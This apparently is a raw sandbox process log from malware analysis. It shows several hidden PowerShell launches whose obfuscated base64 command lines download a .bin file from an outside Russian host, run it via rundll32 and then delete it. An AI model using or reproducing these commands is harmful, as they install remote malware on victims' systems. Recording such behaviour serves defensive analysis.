jAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2792"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2904"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
2932"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAH